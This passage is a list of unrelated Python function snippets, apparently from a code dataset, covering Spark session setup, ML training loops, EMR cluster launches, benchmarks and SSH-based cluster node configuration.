#Invoke Functions to process data\n process_data(spark, s3_bucket)", "def open_spark_session(config: Config):\n if not config.session_exists(\"SparkSession\"):\n config.debug(\"SparkSession\", \"Opening Spark session\")\n session = SparkSess(config).spark\n config.add_session(\"SparkSession\", session)\n config.debug(\"SparkSession\", f\"Spark session added to sessions opened\")\n else:\n config.debug(\"SparkSession\", f\"Spark session already exists\")", "def __init__(\n self,\n conf: ExpConfig,\n estep_conf: EStepConfig,\n model: Trainable,\n train_data_file: str,\n val_data_file: str = None,\n ):\n if tvo.get_run_policy() == \"mpi\":\n init_processes()\n train_dataset = get_h5_dataset_to_processes(train_data_file, (\"train_data\", \"data\"))\n val_dataset = None\n if val_data_file is not None:\n val_dataset = get_h5_dataset_to_processes(val_data_file, (\"val_data\", \"data\"))\n\n setattr(conf, \"train_dataset\", train_data_file)\n setattr(conf, \"val_dataset\", val_data_file)\n super().__init__(conf, estep_conf, model, train_dataset, val_dataset)", "def train_parallel(config):\n _setup_parallel_env()\n print(f\" | Starting training on {os.getenv('RANK_SIZE', None)} devices.\")\n\n pre_train_dataset = load_dataset(\n data_files=config.pre_train_dataset,\n batch_size=config.batch_size,\n sink_mode=config.dataset_sink_mode,\n rank_size=MultiDevice.get_group_size(),\n rank_id=MultiDevice.get_rank()\n ) if config.pre_train_dataset else None\n fine_tune_dataset = load_dataset(\n data_files=config.fine_tune_dataset,\n batch_size=config.batch_size,\n sink_mode=config.dataset_sink_mode,\n rank_size=MultiDevice.get_group_size(),\n rank_id=MultiDevice.get_rank()\n ) if config.fine_tune_dataset else None\n test_dataset = load_dataset(\n data_files=config.test_dataset,\n batch_size=config.batch_size,\n sink_mode=config.dataset_sink_mode,\n rank_size=MultiDevice.get_group_size(),\n rank_id=MultiDevice.get_rank()\n ) if config.test_dataset else None\n\n _build_training_pipeline(config=config,\n pre_training_dataset=pre_train_dataset,\n fine_tune_dataset=fine_tune_dataset,\n test_dataset=test_dataset)", "def train(self, config, **kwargs):\n\n config_parameters = utils.parse_config_or_kwargs(config, **kwargs)\n outputdir = Path(\n config_parameters['outputpath'], config_parameters['model'],\n \"{}_{}\".format(\n datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%m'),\n uuid.uuid1().hex[:8]))\n # Early init because of creating dir\n checkpoint_handler = ModelCheckpoint(\n outputdir,\n 'run',\n n_saved=1,\n require_empty=False,\n create_dir=True,\n score_function=lambda engine: -engine.state.metrics['Loss'],\n save_as_state_dict=False,\n score_name='loss')\n logger = utils.getfile_outlogger(Path(outputdir, 'train.log'))\n logger.info(\"Storing files in {}\".format(outputdir))\n # utils.pprint_dict\n utils.pprint_dict(config_parameters, logger.info)\n logger.info(\"Running on device {}\".format(DEVICE))\n labels_df = pd.read_csv(config_parameters['trainlabel'], sep=' ')\n labels_df['encoded'], encoder = utils.encode_labels(\n labels=labels_df['bintype'])\n train_df, cv_df = utils.split_train_cv(labels_df)\n\n transform = utils.parse_transforms(config_parameters['transforms'])\n utils.pprint_dict({'Classes': encoder.classes_},\n logger.info,\n formatter='pretty')\n utils.pprint_dict(transform, logger.info, formatter='pretty')\n if 'sampler' in config_parameters and config_parameters[\n 'sampler'] == 'MinimumOccupancySampler':\n # Asserts that each \"batch\" contains at least one instance\n train_sampler = 
dataset.MinimumOccupancySampler(\n np.stack(train_df['encoded'].values))\n\n sampling_kwargs = {\"sampler\": train_sampler, \"shuffle\": False}\n elif 'shuffle' in config_parameters and config_parameters['shuffle']:\n sampling_kwargs = {\"shuffle\": True}\n else:\n sampling_kwargs = {\"shuffle\": False}\n\n logger.info(\"Using Sampler {}\".format(sampling_kwargs))\n\n colname = config_parameters.get('colname', ('filename', 'encoded')) #\n trainloader = dataset.getdataloader(\n train_df,\n config_parameters['traindata'],\n transform=transform,\n batch_size=config_parameters['batch_size'],\n colname=colname, # For other datasets with different key names\n num_workers=config_parameters['num_workers'],\n **sampling_kwargs)\n cvdataloader = dataset.getdataloader(\n cv_df,\n config_parameters['traindata'],\n transform=None,\n shuffle=False,\n colname=colname, # For other datasets with different key names\n batch_size=config_parameters['batch_size'],\n num_workers=config_parameters['num_workers'])\n if 'pretrained' in config_parameters and config_parameters[\n 'pretrained'] is not None:\n model = models.load_pretrained(config_parameters['pretrained'],\n outputdim=len(encoder.classes_))\n else:\n model = getattr(models, config_parameters['model'],\n 'LightCNN')(inputdim=trainloader.dataset.datadim,\n outputdim=len(encoder.classes_),\n **config_parameters['model_args'])\n\n if config_parameters['optimizer'] == 'AdaBound':\n try:\n import adabound\n optimizer = adabound.AdaBound(\n model.parameters(), **config_parameters['optimizer_args'])\n except ImportError:\n logger.info(\n \"Adabound package not found, install via pip install adabound. Using Adam instead\"\n )\n config_parameters['optimizer'] = 'Adam'\n config_parameters['optimizer_args'] = {\n } # Default adam is adabount not found\n else:\n optimizer = getattr(\n torch.optim,\n config_parameters['optimizer'],\n )(model.parameters(), **config_parameters['optimizer_args'])\n\n utils.pprint_dict(optimizer, logger.info, formatter='pretty')\n utils.pprint_dict(model, logger.info, formatter='pretty')\n if DEVICE.type != 'cpu' and torch.cuda.device_count() > 1:\n logger.info(\"Using {} GPUs!\".format(torch.cuda.device_count()))\n model = torch.nn.DataParallel(model)\n criterion = torch.nn.CrossEntropyLoss().to(DEVICE)\n model = model.to(DEVICE)\n\n precision = Precision()\n recall = Recall()\n f1_score = (precision * recall * 2 / (precision + recall)).mean()\n metrics = {\n 'Loss': Loss(criterion),\n 'Precision': precision.mean(),\n 'Recall': recall.mean(),\n 'Accuracy': Accuracy(),\n 'F1': f1_score,\n }\n\n # batch contains 3 elements, X,Y and filename. 
Filename is only used\n # during evaluation\n def _prep_batch(batch, device=DEVICE, non_blocking=False):\n x, y, _ = batch\n return (convert_tensor(x, device=device,\n non_blocking=non_blocking),\n convert_tensor(y, device=device,\n non_blocking=non_blocking))\n\n train_engine = create_supervised_trainer(model,\n optimizer=optimizer,\n loss_fn=criterion,\n prepare_batch=_prep_batch,\n device=DEVICE)\n inference_engine = create_supervised_evaluator(\n model, metrics=metrics, prepare_batch=_prep_batch, device=DEVICE)\n\n RunningAverage(output_transform=lambda x: x).attach(\n train_engine, 'run_loss') # Showing progressbar during training\n pbar = ProgressBar(persist=False)\n pbar.attach(train_engine, ['run_loss'])\n scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer,\n patience=3,\n factor=0.1)\n\n @inference_engine.on(Events.COMPLETED)\n def update_reduce_on_plateau(engine):\n val_loss = engine.state.metrics['Loss']\n if 'ReduceLROnPlateau' == scheduler.__class__.__name__:\n scheduler.step(val_loss)\n else:\n scheduler.step()\n\n early_stop_handler = EarlyStopping(\n patience=5,\n score_function=lambda engine: -engine.state.metrics['Loss'],\n trainer=train_engine)\n inference_engine.add_event_handler(Events.EPOCH_COMPLETED,\n early_stop_handler)\n inference_engine.add_event_handler(Events.EPOCH_COMPLETED,\n checkpoint_handler, {\n 'model': model,\n 'encoder': encoder,\n 'config': config_parameters,\n })\n\n @train_engine.on(Events.EPOCH_COMPLETED)\n def compute_validation_metrics(engine):\n inference_engine.run(cvdataloader)\n results = inference_engine.state.metrics\n output_str_list = [\n \"Validation Results - Epoch : {:<5}\".format(engine.state.epoch)\n ]\n for metric in metrics:\n output_str_list.append(\"{} {:<5.3f}\".format(\n metric, results[metric]))\n logger.info(\" \".join(output_str_list))\n pbar.n = pbar.last_print_n = 0\n\n train_engine.run(trainloader, max_epochs=config_parameters['epochs'])\n return outputdir", "def run(context, path=\"\"):\n common.success(f\"Tests {path} running \")\n return start.run_python(\n context,\n f\"-m pytest {path}\"\n )", "def execute(self, context):\n\n self._hook = SparkSubmitHook(\n conf=self._conf,\n conn_id=self._conn_id,\n ssh_conn_id=self._ssh_conn_id,\n files=self._files,\n py_files=self._py_files,\n driver_classpath=self._driver_classpath,\n jars=self._jars,\n java_class=self._java_class,\n packages=self._packages,\n exclude_packages=self._exclude_packages,\n repositories=self._repositories,\n total_executor_cores=self._total_executor_cores,\n executor_cores=self._executor_cores,\n executor_memory=self._executor_memory,\n driver_memory=self._driver_memory,\n keytab=self._keytab,\n principal=self._principal,\n name=self._name,\n num_executors=self._num_executors,\n application_args=self._application_args,\n env_vars=self._env_vars,\n verbose=self._verbose,\n dataeng_spark=self.dataeng_spark,\n dataeng_spark_pyenv_path=self.dataeng_spark_pyenv_path\n\n )\n self._hook.submit(self._application)", "def train_single(config):\n print(\" | Starting training on single device.\")\n\n pre_train_dataset = load_dataset(data_files=config.pre_train_dataset,\n batch_size=config.batch_size,\n sink_mode=config.dataset_sink_mode) if config.pre_train_dataset else None\n fine_tune_dataset = load_dataset(data_files=config.fine_tune_dataset,\n batch_size=config.batch_size,\n sink_mode=config.dataset_sink_mode) if config.fine_tune_dataset else None\n test_dataset = load_dataset(data_files=config.test_dataset,\n batch_size=config.batch_size,\n 
sink_mode=config.dataset_sink_mode) if config.test_dataset else None\n\n _build_training_pipeline(config=config,\n pre_training_dataset=pre_train_dataset,\n fine_tune_dataset=fine_tune_dataset,\n test_dataset=test_dataset)", "def run(config):\n\tlog.debug('-- in example.py')\n#\tgetWLSMachineandandExecuteSecondary(config)\n#\t__createPegaConfigCommand(config)\n#\tcreateUsers(config)\n#\t__connectAdminServer(config)\n\tconnectAdminServerOverSSL(config)", "def startTestRun(self):", "def get_dataflow_spark_session(app_name=\"DataFlow\", file_location=None, profile_name=None, spark_config={}):\n if in_dataflow():\n spark_builder = SparkSession.builder.appName(app_name)\n else:\n # Import OCI.\n try:\n import oci\n except:\n raise Exception(\n \"You need to install the OCI python library to test locally\"\n )\n\n # Use defaults for anything unset.\n if file_location is None:\n file_location = oci.config.DEFAULT_LOCATION\n if profile_name is None:\n profile_name = oci.config.DEFAULT_PROFILE\n\n # Load the config file.\n try:\n oci_config = oci.config.from_file(\n file_location=file_location, profile_name=profile_name\n )\n except Exception as e:\n print(\"You need to set up your OCI config properly to run locally\")\n raise e\n conf = SparkConf()\n conf.set(\"fs.oci.client.auth.tenantId\", oci_config[\"tenancy\"])\n conf.set(\"fs.oci.client.auth.userId\", oci_config[\"user\"])\n conf.set(\"fs.oci.client.auth.fingerprint\", oci_config[\"fingerprint\"])\n conf.set(\"fs.oci.client.auth.pemfilepath\", oci_config[\"key_file\"])\n conf.set(\n \"fs.oci.client.hostname\",\n \"https://objectstorage.{0}.oraclecloud.com\".format(\n oci_config[\"region\"]),\n )\n spark_builder = SparkSession.builder.appName(\n app_name).config(conf=conf)\n\n # Add in extra configuration.\n for key, val in spark_config.items():\n spark_builder.config(key, val)\n\n # Create the Spark session.\n session = spark_builder.enableHiveSupport().getOrCreate()\n return session", "def create_spark_session():\n try:\n spark = (\n SparkSession.builder\n # .config(\"spark.hadoop.fs.s3a.awsAccessKeyId\", os.environ['AWS_ACCESS_KEY_ID'])\n # .config(\"spark.hadoop.fs.s3a.awsSecretAccessKey\", os.environ['AWS_SECRET_ACCESS_KEY'])\n .enableHiveSupport()\n .getOrCreate()\n )\n # spark._jsc.hadoopConfiguration().set(\"fs.s3a.awsAccessKeyId\", os.environ['AWS_ACCESS_KEY_ID'])\n # spark._jsc.hadoopConfiguration().set(\"fs.s3a.awsSecretAccessKey\", os.environ['AWS_SECRET_ACCESS_KEY'])\n # spark._jsc.hadoopConfiguration().set(\"fs.s3a.impl\",\"org.apache.hadoop.fs.s3a.S3AFileSystem\")\n # spark._jsc.hadoopConfiguration().set(\"com.amazonaws.services.s3.enableV4\", \"true\")\n # spark._jsc.hadoopConfiguration().set(\"fs.s3a.aws.credentials.provider\",\"org.apache.hadoop.fs.s3a.BasicAWSCredentialsProvider\")\n # spark._jsc.hadoopConfiguration().set(\"fs.s3a.endpoint\", \"s3.amazonaws.com\")\n except Exception as e:\n logger.error('Pyspark session failed to be created...')\n raise\n return spark", "def main():\n # create a Spark session\n spark = create_spark_session()\n\n # set input & output data locations\n input_data = \"data/\"\n output_data = \"results/\"\n\n # Gather/read the datasets\n df_visits = spark.read.parquet(\"data/immigration_data\")\n df_demo = spark.read.csv(\"data/us-cities-demographics.csv\", sep=\";\", header=True)\n df_airports = spark.read.csv(\"data/airport-codes_csv.csv\", header=True)\n df_airport_codes = get_airport_codes(spark)\n df_countries = get_countries(spark)\n df_states = get_states(spark)\n df_visa = 
get_visa(spark)\n\n # clean the datasets\n df_airports_clean = clean_airport_codes(spark,df_airports)\n df_demo_clean= clean_demographics(spark,df_demo)\n df_visits_clean = clean_immigration_data(spark, df_visits, df_airport_codes, df_countries, df_states, df_visa)\n\n # load the fact and dimensions in parquet files\n load_dimensions(output_data, df_countries, df_states, df_visa, df_demo_clean, df_airports_clean)\n load_fact(spark,output_data, df_visits_clean)\n\n # run validation checks\n validate_dimensions(spark,['dim_visa','dim_state','dim_country','dim_us_demo','dim_airports'],output_data)\n validate_fact(spark,'fact_visits',output_data)", "def train_main(cls):\n launcher = cls()\n launcher.launch()", "def Run(benchmark_spec):\n cluster = benchmark_spec.dpb_service\n storage_service = cluster.storage_service\n metadata = benchmark_spec.dpb_service.GetMetadata()\n\n metadata['benchmark'] = BENCHMARK_NAMES[FLAGS.dpb_sparksql_query]\n\n # Run PySpark Spark SQL Runner\n report_dir = '/'.join([cluster.base_dir, f'report-{int(time.time()*1000)}'])\n args = [\n '--sql-scripts',\n ','.join(benchmark_spec.staged_queries),\n '--report-dir',\n report_dir,\n ]\n if FLAGS.dpb_sparksql_database:\n args += ['--database', FLAGS.dpb_sparksql_database]\n table_metadata = _GetTableMetadata(benchmark_spec)\n if table_metadata:\n table_metadata_file = '/'.join([cluster.base_dir, 'metadata.json'])\n _StageMetadata(table_metadata, storage_service, table_metadata_file)\n args += ['--table-metadata', table_metadata_file]\n else:\n # If we don't pass in tables, we must be reading from hive.\n # Note you can even read from Hive without --create_hive_tables if they\n # were precreated.\n args += ['--enable-hive', 'True']\n if FLAGS.dpb_sparksql_table_cache:\n args += ['--table-cache', FLAGS.dpb_sparksql_table_cache]\n if FLAGS.dpb_sparksql_simultaneous:\n args += ['--simultaneous', 'True']\n jars = []\n if FLAGS.spark_bigquery_connector:\n jars.append(FLAGS.spark_bigquery_connector)\n job_result = cluster.SubmitJob(\n pyspark_file='/'.join([cluster.base_dir, SPARK_SQL_RUNNER_SCRIPT]),\n job_arguments=args,\n job_jars=jars,\n job_type=dpb_service.BaseDpbService.PYSPARK_JOB_TYPE)\n\n # Spark can only write data to directories not files. 
So do a recursive copy\n # of that directory and then search it for the single JSON file with the\n # results.\n temp_run_dir = temp_dir.GetRunDirPath()\n storage_service.Copy(report_dir, temp_run_dir, recursive=True)\n report_file = None\n for dir_name, _, files in os.walk(\n os.path.join(temp_run_dir, os.path.basename(report_dir))):\n for filename in files:\n if filename.endswith('.json'):\n report_file = os.path.join(dir_name, filename)\n logging.info(report_file)\n if not report_file:\n raise errors.Benchmarks.RunError('Job report not found.')\n\n results = []\n run_times = {}\n passing_queries = set()\n with open(report_file, 'r') as file:\n for line in file:\n result = json.loads(line)\n logging.info('Timing: %s', result)\n query_id = _GetQueryId(result['script'])\n assert query_id\n passing_queries.add(query_id)\n metadata_copy = metadata.copy()\n metadata_copy['query'] = query_id\n results.append(\n sample.Sample('sparksql_run_time', result['duration'], 'seconds',\n metadata_copy))\n run_times[query_id] = result['duration']\n\n metadata['failing_queries'] = ','.join(\n sorted(set(FLAGS.dpb_sparksql_order) - passing_queries))\n\n results.append(\n sample.Sample('sparksql_total_wall_time', job_result.wall_time, 'seconds',\n metadata))\n results.append(\n sample.Sample('sparksql_geomean_run_time',\n sample.GeoMean(run_times.values()), 'seconds', metadata))\n cluster_create_time = cluster.GetClusterCreateTime()\n if cluster_create_time is not None:\n results.append(\n sample.Sample('dpb_cluster_create_time', cluster_create_time, 'seconds',\n metadata))\n return results", "def run_starter(self, expect_to_fail=False):", "def test_documentation_popxl_mnist_rts_train_test(self):\n filename = \"mnist_rts.py --replication-factor 2 --rts --test\"\n self.run_python(filename, file_dir=working_dir, working_dir=working_dir)", "def start(self):\n\n self.loadConf()\n self.loadDrivers()\n self.loadFeeds()\n self.runScheduler()\n self.scheduler.print_jobs()\n self.scheduler.start()\n self.printConf(\"test\")\n print(\"scheduler started\")", "def main():\n print('Retrieving iris data from servers...', end='')\n iris_data = sklearn.datasets.load_iris()\n print('done')\n sys.stdout.flush()\n\n X = iris_data['data']\n Y = [iris_data['target_names'][label] for label in iris_data['target']]\n\n examples = [{'id': 'EXAMPLE_{}'.format(i),\n 'y': y,\n 'x': {f'f{j}': x_val for j, x_val in enumerate(x)}}\n for i, (x, y) in enumerate(zip(X, Y))]\n\n examples_train, examples_test = train_test_split(examples, test_size=0.33,\n random_state=42)\n\n print('Writing training and testing files...', end='')\n for examples, suffix in [(examples_train, 'train'), (examples_test,\n 'test')]:\n iris_dir = os.path.join('iris', suffix)\n if not os.path.exists(iris_dir):\n os.makedirs(iris_dir)\n jsonlines_path = os.path.join(iris_dir,\n 'example_iris_features.jsonlines')\n with open(jsonlines_path, 'w') as f:\n for ex in examples:\n f.write(f'{json.dumps(ex)}\\n')\n print('done')", "def experiment(**config):\n from ..training.train import training\n \n training(config)", "def setup(self, skip_start=False):\n nprev_comm = self.comm_count\n nprev_thread = self.thread_count\n nprev_fd = self.fd_count\n self.driver = self.driver_class(*self.driver_args, **self.driver_kwargs)\n if not skip_start:\n self.driver.start()\n os.environ.update(self.driver.env)\n self._skip_start = skip_start\n super(TestBase, self).setup(nprev_comm=nprev_comm,\n nprev_thread=nprev_thread,\n nprev_fd=nprev_fd)", "def to_spark(self):\n from 
intake_spark.base import SparkHolder\n args = [\n ['read'],\n ['parquet', [self._urlpath]]\n ]\n sh = SparkHolder(True, args, {})\n return sh.setup()", "def execute(self):\n try:\n spark_context = self.spark.sparkContext\n spark_context.addFile(self.location)\n return self.spark.read.format(self.file_format) \\\n .load(SparkFiles.get(self.location.split('/')[-1]))\n except AnalysisException as exp:\n raise", "def main(config: DictConfig) -> None:\n\n if config.test:\n # TODO: clean up current working directory with test=true\n experiment_path = os.getcwd().replace(\"test=true,\", \"\").replace(\"test=True,\", \"\")\n if config.unsupervised:\n trainer = UnsupervisedTrainer(config, experiment_path)\n else:\n trainer = Trainer(config, experiment_path)\n summary, report = trainer.test()\n print(summary)\n print(report)\n else:\n experiment_path = os.getcwd()\n if config.unsupervised:\n trainer = UnsupervisedTrainer(config, experiment_path)\n else:\n trainer = Trainer(config, experiment_path)\n trainer.run()\n print(\"Launched training. Press CTRL+C to stop.\")\n print(f\"Logs available at {os.getcwd()}\")", "def emr_run_spark():\n\n try:\n response = emr.run_job_flow(\n Name=\"Lab Spark Cluster\",\n LogUri=log_uri,\n ReleaseLabel='emr-5.28.0',\n Instances={\n 'MasterInstanceType': 'm5.xlarge',\n 'SlaveInstanceType': 'r5.2xlarge',\n 'InstanceCount': 4,\n 'KeepJobFlowAliveWhenNoSteps': True,\n 'TerminationProtected': False,\n 'Ec2SubnetId': subnet_id,\n 'EmrManagedMasterSecurityGroup': master_sg,\n 'EmrManagedSlaveSecurityGroup': slave_sg,\n 'ServiceAccessSecurityGroup': service_access_sg\n },\n Applications=[\n {\n 'Name': 'Spark'\n }\n ],\n BootstrapActions=[\n {\n 'Name': 'Maximize Spark Default Config',\n 'ScriptBootstrapAction': {\n 'Path': 's3://support.elasticmapreduce/spark/maximize-spark-default-config',\n }\n },\n {\n 'Name': 'Install boto3',\n 'ScriptBootstrapAction': {\n 'Path': f's3://{lab_bucket}/spark/conf/install_python_modules.sh',\n }\n }\n ],\n Steps=[\n {\n 'Name': 'Setup Debugging',\n 'ActionOnFailure': 'TERMINATE_CLUSTER',\n 'HadoopJarStep': {\n 'Jar': 'command-runner.jar',\n 'Args': ['state-pusher-script']\n }\n },\n {\n 'Name': 'setup - copy files',\n 'ActionOnFailure': 'CANCEL_AND_WAIT',\n 'HadoopJarStep': {\n 'Jar': 'command-runner.jar',\n 'Args': ['aws', 's3', 'cp', f's3://{lab_bucket}/spark/main.py', '/home/hadoop/']\n }\n },\n {\n 'Name': 'Run Spark',\n 'ActionOnFailure': 'CANCEL_AND_WAIT',\n 'HadoopJarStep': {\n 'Jar': 'command-runner.jar',\n 'Args': ['spark-submit', '/home/hadoop/main.py', lab_bucket, s3_data_repo]\n }\n }\n ],\n Configurations=[\n {\n 'Classification': 'spark-env',\n \"Configurations\": [\n {\n \"Classification\": \"export\",\n \"Properties\": {\n \"PYSPARK_PYTHON\": \"/usr/bin/python3\"\n }\n }\n ]\n }\n ],\n VisibleToAllUsers=True,\n JobFlowRole='EMR_EC2_DefaultRole',\n ServiceRole='EMR_DefaultRole',\n Tags=[\n {\n 'Key': 'Project',\n 'Value': 'Data Lake Quickstart'\n },\n {\n 'Key': 'Prefix',\n 'Value': prefix_name\n }\n ]\n )\n\n return response\n\n except ClientError as error:\n logger.error(\"The error occurred when configure emr to run spark\")\n logger.exception(error)", "def main():\n driver = Driver()\n driver.start()", "def main():\n\n # Chdir into script directory so to properly resolve relative paths in configuration\n os.chdir(os.path.dirname(os.path.realpath(__file__)) + \"/\")\n\n # Disable proxy as we access localhost, both to avoid overhead and issues with proxy misconfiguration\n os.environ['NO_PROXY'] = '*'\n\n # Stop any 
GraphDB server that we previously started and is possibly still around due to script interruption/crash\n shell(f\"{cmd_graphdb} stopall\")\n\n # Generate synthetic traces, both for populating the repositories and for the {sf, sp, pf, pp} tests\n prepare_traces()\n \n # Generate central repositories (if needed)\n for size, approach in itertools.product(sizes, approaches):\n prepare_repository(size, approach)\n \n # Run experiments (if needed)\n for size, approach in itertools.product(sizes, approaches):\n run_experiments(size, approach)", "def create_spark_session():\n spark = SparkSession \\\n .builder \\\n .config(\"spark.jars.packages\", \"org.apache.hadoop:hadoop-aws:2.7.0\") \\\n .config(\"spark.hadoop.fs.s3a.awsAccessKeyId\", os.environ['AWS_ACCESS_KEY_ID']) \\\n .config(\"spark.hadoop.fs.s3a.awsSecretAccessKey\", os.environ['AWS_SECRET_ACCESS_KEY']) \\\n .enableHiveSupport().getOrCreate()\n \n return spark", "def test_srnaseq_star(install_test_files, data_dir):\n with make_workdir() as workdir:\n cl = [\"bcbio_nextgen.py\",\n get_post_process_yaml(data_dir, workdir),\n os.path.join(data_dir, os.pardir, \"test_srnaseq\"),\n os.path.join(data_dir, \"run_info-srnaseq_star.yaml\")]\n subprocess.check_call(cl)", "def test_spark_read_file_csv(spark):\n path = os.getcwd() + '/data_processor/tests/test_data/test.csv'\n read_df = IOHandler(spark).spark_read_file(file_path=path)\n assert read_df.count() == 2", "def init_test_env(setting_path, output_path, file_list,fname_list):\n dm_json_path = os.path.join(setting_path, 'cur_data_setting.json')\n tsm_json_path = os.path.join(setting_path, 'cur_task_setting.json')\n assert os.path.isfile(tsm_json_path), \"task setting not exists\"\n dm = DataTask('task_reg', dm_json_path) if os.path.isfile(dm_json_path) else None\n tsm = ModelTask('task_reg', tsm_json_path)\n file_num = len(file_list)\n os.makedirs(os.path.join(output_path, 'seg/test'), exist_ok=True)\n os.makedirs(os.path.join(output_path, 'seg/res'), exist_ok=True)\n file_txt_path = os.path.join(output_path, 'seg/test/file_path_list.txt')\n fn_txt_path = os.path.join(output_path, 'seg/test/file_name_list.txt')\n has_label = len(file_list[0])==2\n if fname_list is None:\n if has_label:\n fname_list = [get_file_name(file_list[i][0]) for i in range(file_num)]\n else:\n fname_list = [get_file_name(file_list[i]) for i in range(file_num)]\n write_list_into_txt(file_txt_path, file_list)\n write_list_into_txt(fn_txt_path, fname_list)\n data_task_name = 'seg'\n cur_task_name = 'res'\n if dm is not None:\n dm.data_par['datapro']['dataset']['output_path'] = output_path\n dm.data_par['datapro']['dataset']['task_name'] = data_task_name\n tsm.task_par['tsk_set']['task_name'] = cur_task_name\n tsm.task_par['tsk_set']['output_root_path'] = os.path.join(output_path, data_task_name)\n return dm, tsm", "def start():\n\n config = os.path.join(tempfile.gettempdir(), \"testapi.yml\")\n\n with open(config, \"w\", encoding=\"utf-8\") as output:\n output.write(WORKFLOWS)\n\n client = TestClient(app)\n start()\n\n return client", "def common_setup(ssh_client):\n with open_cfg() as cfg:\n delete_hdfs = cfg.getboolean('main', 'delete_hdfs')\n # preliminary steps required due to differences between azure and aws\n if c.PROVIDER == \"AZURE\":\n\n # todo only if first run\n if c.NUM_INSTANCE > 0 or True:\n print(\"In common_setup, NUM_INSTANCE=\" + str(c.NUM_INSTANCE))\n # add ssh key that matches the public one used during creation\n if not c.PRIVATE_KEY_NAME in ssh_client.listdir(\"/home/ubuntu/.ssh/\"):\n 
ssh_client.put(localpath=c.PRIVATE_KEY_PATH, remotepath=\"/home/ubuntu/.ssh/\" + c.PRIVATE_KEY_NAME)\n ssh_client.run(\"chmod 400 /home/ubuntu/.ssh/\" + c.PRIVATE_KEY_NAME)\n\n # ssh_client.run(\"sudo groupadd supergroup\")\n ssh_client.run(\"sudo usermod -aG supergroup $USER\")\n ssh_client.run(\"sudo usermod -aG supergroup root\")\n\n # join docker group\n ssh_client.run(\"sudo usermod -aG docker $USER\")\n\n ssh_client.run(\"mkdir /usr/local/spark/spark-events\")\n\n # ssh_client.run(\"sudo chmod -R 777 /mnt\")\n\n # to refresh groups\n ssh_client.close()\n ssh_client.connect()\n\n # restore environmental variables lost when creating the image\n ssh_client.run(\"echo 'export JAVA_HOME=/usr/lib/jvm/java-8-oracle' >> $HOME/.bashrc\")\n ssh_client.run(\"echo 'export HADOOP_INSTALL=/usr/local/lib/hadoop-2.7.2' >> $HOME/.bashrc\")\n ssh_client.run(\"echo 'export PATH=$PATH:$HADOOP_INSTALL/bin' >> $HOME/.bashrc\")\n ssh_client.run(\"echo 'export PATH=$PATH:$HADOOP_INSTALL/sbin' >> $HOME/.bashrc\")\n ssh_client.run(\"echo 'export HADOOP_MAPRED_HOME=$HADOOP_INSTALL' >> $HOME/.bashrc\")\n ssh_client.run(\"echo 'export HADOOP_COMMON_HOME=$HADOOP_INSTALL' >> $HOME/.bashrc\")\n ssh_client.run(\"echo 'export HADOOP_HDFS_HOME=$HADOOP_INSTALL' >> $HOME/.bashrc\")\n ssh_client.run(\"echo 'export HADOOP_HOME=$HADOOP_INSTALL' >> $HOME/.bashrc\")\n ssh_client.run(\"echo 'export YARN_HOME=$HADOOP_INSTALL' >> $HOME/.bashrc\")\n ssh_client.run(\"echo 'export HADOOP_COMMON_LIB_NATIVE_DIR=$HADOOP_INSTALL/lib/native/' >> $HOME/.bashrc\")\n ssh_client.run(\"echo 'export HADOOP_OPTS=\\\"-Djava.library.path=$HADOOP_INSTALL/lib/native\\\"' >> $HOME/.bashrc\")\n ssh_client.run(\n \"echo 'export LD_LIBRARY_PATH=$HADOOP_INSTALL/lib/native:$LD_LIBRARY_PATH' >> $HOME/.bashrc\") # to fix \"unable to load native hadoop lib\" in spark\n\n ssh_client.run(\"source $HOME/.bashrc\")\n\n if c.PROVIDER == \"AWS_SPOT\":\n ssh_client.run(\"echo 'export JAVA_HOME=/usr/lib/jvm/java-8-oracle' >> $HOME/.bashrc\")\n ssh_client.run(\"echo 'export HADOOP_INSTALL=/usr/local/lib/hadoop-2.7.2' >> $HOME/.bashrc\")\n ssh_client.run(\"echo 'export PATH=$PATH:$HADOOP_INSTALL/bin' >> $HOME/.bashrc\")\n ssh_client.run(\"echo 'export PATH=$PATH:$HADOOP_INSTALL/sbin' >> $HOME/.bashrc\")\n ssh_client.run(\"echo 'export HADOOP_MAPRED_HOME=$HADOOP_INSTALL' >> $HOME/.bashrc\")\n ssh_client.run(\"echo 'export HADOOP_COMMON_HOME=$HADOOP_INSTALL' >> $HOME/.bashrc\")\n ssh_client.run(\"echo 'export HADOOP_HDFS_HOME=$HADOOP_INSTALL' >> $HOME/.bashrc\")\n ssh_client.run(\"echo 'export HADOOP_HOME=$HADOOP_INSTALL' >> $HOME/.bashrc\")\n ssh_client.run(\"echo 'export YARN_HOME=$HADOOP_INSTALL' >> $HOME/.bashrc\")\n ssh_client.run(\"echo 'export HADOOP_COMMON_LIB_NATIVE_DIR=$HADOOP_INSTALL/lib/native' >> $HOME/.bashrc\")\n ssh_client.run(\"echo 'export HADOOP_OPTS=\\\"-Djava.library.path=$HADOOP_INSTALL/lib/native\\\"' >> $HOME/.bashrc\")\n ssh_client.run(\n \"echo 'export LD_LIBRARY_PATH=$HADOOP_INSTALL/lib/native:$LD_LIBRARY_PATH' >> $HOME/.bashrc\") # to fix \"unable to load native hadoop lib\" in spark\n ssh_client.run(\"source $HOME/.bashrc\")\n \n ssh_client.run(\"export GOMAXPROCS=`nproc`\")\n\n if c.UPDATE_SPARK_DOCKER:\n print(\" Updating Spark Docker Image...\")\n ssh_client.run(\"docker pull elfolink/spark:2.0\")\n\n if delete_hdfs:\n ssh_client.run(\"sudo umount /mnt\")\n ssh_client.run(\n \"sudo mkfs.ext4 -E nodiscard \" + c.TEMPORARY_STORAGE + \" && sudo mount -o discard \" + c.TEMPORARY_STORAGE + \" /mnt\")\n\n ssh_client.run(\"test -d /mnt/tmp || 
